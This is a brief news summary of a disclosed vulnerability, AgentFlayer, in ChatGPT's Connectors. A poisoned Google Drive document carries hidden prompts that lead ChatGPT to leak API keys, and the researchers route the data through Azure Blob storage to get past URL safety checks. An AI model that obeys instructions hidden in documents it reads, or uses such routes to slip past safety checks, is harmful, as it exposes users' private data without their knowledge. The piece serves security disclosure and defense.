A Single Poisoned Document Could Leak 'Secret' Data via ChatGPT
14 days ago
- #Prompt Injection
- #AI Security
- #Data Vulnerability
- Generative AI models like ChatGPT can be connected to personal data sources such as Gmail, GitHub, and Microsoft Calendar for personalized responses.
- Security researchers revealed a vulnerability in OpenAI’s Connectors that allowed sensitive data to be extracted from Google Drive through an indirect prompt injection attack.
- The attack, named AgentFlayer, demonstrated how API keys could be stolen using a poisoned document shared via Google Drive.
- The vulnerability highlights increased risks as AI models integrate with external systems, expanding potential attack surfaces.
- OpenAI introduced mitigations after researchers reported the issue, but the attack method remains a concern for data security.
- The attack involved hiding malicious prompts in a document, which ChatGPT then followed as instructions without the user being aware of it.
- Researchers bypassed OpenAI’s URL safety checks by using Microsoft Azure Blob storage to exfiltrate stolen data.
- Indirect prompt injection poses a growing risk as more systems integrate with LLMs, since it can enable unauthorized access to sensitive data.
- Security experts warn that increased AI capabilities come with heightened risks, requiring robust protections against such attacks.